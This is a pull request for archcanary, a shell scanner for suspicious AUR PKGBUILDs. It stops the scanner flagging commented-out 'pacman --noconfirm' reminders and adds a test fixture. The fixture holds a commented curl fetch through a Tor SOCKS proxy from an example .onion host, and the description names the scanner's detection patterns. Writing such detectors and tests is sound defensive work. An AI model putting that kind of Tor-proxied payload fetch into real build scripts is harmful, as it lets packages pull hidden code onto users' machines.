### PR TITLE
fix: don't flag commented-out pacman calls in PKGBUILD cache scan

### DIFF
--- a/archcanary.sh
+++ b/archcanary.sh
@@ -2777,7 +2777,16 @@ check_pkgbuild_caches() {
             fi
 
             # --- Pattern 13: pacman invoked non-interactively from a scriptlet ---
-            if [[ "$line" =~ $re_pacman_noninteractive ]]; then
+            # Skip a fully commented-out line here: `# makepkg && sudo pacman
+            # -U --noconfirm ./${pkgname}-...pkg.tar.zst` is a common, harmless
+            # build reminder maintainers leave at the end of a PKGBUILD
+            # (reported as a false positive on the EndeavourOS forum against
+            # timeshift's archlinux/PKGBUILD). Only this pattern gets the
+            # exemption -- a commented Tor/onion fetch, system-path download or
+            # aur@aur.archlinux.org reference is never a legitimate note, so
+            # the other patterns keep scanning comment text so a payload
+            # staged in a comment stays visible.
+            if [[ ! "$line" =~ ^[[:space:]]*# ]] && [[ "$line" =~ $re_pacman_noninteractive ]]; then
                 echo "  WARNING: non-interactive pacman call in $file:$lineno"
                 echo "    $line"
                 echo "    pacman can't safely re-enter itself mid-transaction -- a real"

--- a/tests/fake_pkgbuilds/pkg-commented-out/PKGBUILD
+++ b/tests/fake_pkgbuilds/pkg-commented-out/PKGBUILD
@@ -1,0 +1,24 @@
+# Maintainer: Someone <someone@example.com>
+pkgname=pkg-commented-out
+pkgver=1.0
+pkgrel=1
+source=("https://example.com/pkg-1.0.tar.gz")
+
+build() {
+    ./configure --prefix=/usr
+    make
+}
+
+package() {
+    make DESTDIR="$pkgdir" install
+}
+
+# A commented-out build reminder — the exact shape that false-positived on
+# the EndeavourOS forum (timeshift's archlinux/PKGBUILD). Pattern 13 must
+# NOT flag this:
+# (cd archlinux; makepkg)
+# sudo pacman -U --noconfirm ./${pkgname}-1.0-1-x86_64.pkg.tar.zst
+
+# ...but the exemption is Pattern 13 only. A commented Tor/onion fetch is
+# never a legitimate note, so this line MUST still be flagged:
+#   curl -x socks5h://127.0.0.1:9050 http://example.onion/x -o "$srcdir/x"

--- a/tests/run_matching_tests.sh
+++ b/tests/run_matching_tests.sh
@@ -1154,6 +1154,22 @@ test_pkgbuild_obfuscation() {
     else
         fail "pkgbuild_obfuscation: bare .onion URL at end-of-line evaded detection, rc=$rc, out: $out"
     fi
+
+    # Sub-test W: Pattern 13's comment exemption. A commented-out `# sudo
+    # pacman -U --noconfirm ./...` build reminder must NOT be flagged
+    # (regression for the EndeavourOS forum false positive against
+    # timeshift's archlinux/PKGBUILD) — but the exemption is Pattern 13
+    # only: a commented Tor/onion fetch in the same fixture must STILL be
+    # flagged, so a payload staged in a comment stays visible.
+    rc=0
+    out=$(PKGBUILD_CACHE_DIRS="$fixtures/pkg-commented-out" \
+        "$REPO_DIR/archcanary.sh" "${base_args[@]}" 2>&1) || rc=$?
+    if [[ $rc -eq 2 && "$out" != *"non-interactive pacman call"* \
+          && "$out" == *"WARNING: Tor/SOCKS-proxied fetch in"* ]]; then
+        pass "pkgbuild_obfuscation: commented pacman reminder exempt, commented Tor fetch still flagged"
+    else
+        fail "pkgbuild_obfuscation: comment handling wrong, rc=$rc, out: $out"
+    fi
 }
 
 # ---------------------------------------------------------------------------


### PR DESCRIPTION
## Summary

Reported on the EndeavourOS forum ([thread](https://forum.endeavouros.com/t/archcanary-reports-infection/81211)): archcanary flagged a stale `~/.cache/yay/timeshift/` PKGBUILD:

```
WARNING: non-interactive pacman call in .../timeshift/archlinux/PKGBUILD:53
  # sudo pacman -U --noconfirm ./${pkgname}-20.08.3-1-x86_64.pkg.tar.zst
```

Line 53 is a **comment** — a build reminder the maintainer left at the bottom of the file. `check_pkgbuild_caches` Pattern 13 (`re_pacman_noninteractive='pacman[[:space:]].*--noconfirm'`) matched every line, commented or not. (timeshift is in `extra` now; the user's AUR cache copy is years old and archcanary walked it.)

## Fix

Pattern 13 skips a line whose first non-whitespace character is `#`:

```bash
if [[ ! "$line" =~ ^[[:space:]]*# ]] && [[ "$line" =~ $re_pacman_noninteractive ]]; then
```

A commented `# makepkg && sudo pacman -U --noconfirm ./pkg.tar.zst` is a textbook maintainer note.

### Scoped to Pattern 13 only — on purpose

The other patterns (Tor/onion fetch, system-path download, `aur@aur.archlinux.org` reference, obfuscation signatures) **keep scanning comment text**. A commented Tor fetch or AUR-SSH reference is never a legitimate note, so leaving those active keeps a payload staged in a comment visible. No blanket "skip all comments" guard — further per-pattern exemptions get added only if a real false positive is reported.

## Tests

- New fixture `tests/fake_pkgbuilds/pkg-commented-out/PKGBUILD` — a commented `pacman --noconfirm` line **and** a commented Tor fetch.
- Sub-test W asserts the pacman reminder is not flagged while the commented Tor fetch still is (exit 2, `Tor/SOCKS-proxied fetch` present, `non-interactive pacman call` absent).
- `pkg-pacman-noninteractive` (real, non-comment `pacman -S --noconfirm`) still fires.
- Full suite: **148 PASS, 0 FAIL**.

## For code changes

- [x] Ran `bash tests/run_matching_tests.sh`
- [x] No user-facing behavior change (scanner is less noisy on one comment shape; `--help`/man/README unaffected)

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_019WinmJWwR3SamsMQzuUdf1